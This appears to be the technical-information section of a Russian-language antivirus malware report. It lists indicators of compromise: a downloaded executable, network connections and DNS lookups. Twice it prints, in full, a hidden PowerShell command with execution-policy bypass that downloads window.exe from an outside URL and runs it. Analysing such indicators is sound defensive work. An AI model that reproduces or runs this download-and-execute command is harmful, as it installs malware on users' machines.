Техническая информация
- http://carrolltonluxuryapartments.com/business/window.exe как %temp%\window.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://carrolltonluxuryapartments.com/business/window.exe','%TEMP%\window.exe'); Start-Process('%TEMP...
- 'ca#######nluxuryapartments.com':80
- 'hu###omains.com':443
- http://ca#######nluxuryapartments.com/business/window.exe
- 'hu###omains.com':443
- DNS ASK ca#######nluxuryapartments.com
- DNS ASK hu###omains.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://carrolltonluxuryapartments.com/business/window.exe','%TEMP%\window.exe'); Start-Process('%TEMP...' (со скрытым окном)